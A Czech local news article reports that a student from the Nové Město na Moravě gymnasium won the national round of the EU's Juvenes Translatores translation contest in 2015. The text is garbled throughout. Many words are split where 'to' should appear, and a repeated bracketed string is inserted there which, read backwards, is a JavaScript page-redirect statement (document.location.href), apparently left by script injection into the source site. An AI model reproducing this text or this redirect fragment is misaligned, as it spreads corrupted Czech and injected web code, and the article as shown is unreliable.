Rainbow page separator

Mezi vítězi překladatelské soutěže je i novoměstská studentka

Pátek, 6. února 2015

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Mezi 104 studenty z 21 středních škol se le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos za Českou republiku stala vítězkou překladatelské soutěže pro středoškolské studenty Juvenes Transla[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tores Simona Nevrklová z novoměstského gymnázia.
Soutěž měla celkem 28 vítězů, jednoho za každou členskou zemi Evropské unie. Při klání mladých překladatelů se sešlo celkem tři tisíce účastníků z celkem 740 škol v rámci EU. V dubnu je pro vítěze soutěže připravena cesta do Bruselu, kde jim předá cenu mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topředsedkyně Evropské komise Kristalina Georgievová.
Soutěžící v rámci klání museli přeložit text s tématem evropská identita; ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to texty připravili překladatelé Evropské komise, kteří poté soutěžní práce rovněž ohodnotili.
Studenti si mohli pro překlad vybrat jednu z 552 kombinací, které nabízí 24 úředních jazyků EU – v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ročníku bylo použi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to 148 jazykových kombinací. Soutěžící většinou překládali do svého mateřského jazyka, nejčastěji z angličtiny, což byl i případ české vítězky.
Nechyběly však i méně časté kombinace, jako je překlad z polštiny do řečtiny, případně z němčiny do maďarštiny. Španělská vítězka například překládala text z češtiny.
Soutěž Juvenes Transla[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tores od roku 2007 pořádá Generální ředitelství pro překlady Evropské komise. Cílem soutěže, která je určena sedmnáctiletým studentům středních škol, je propagace výuky jazyků.

FOTO: Archiv Gymnázium Vincence Makovského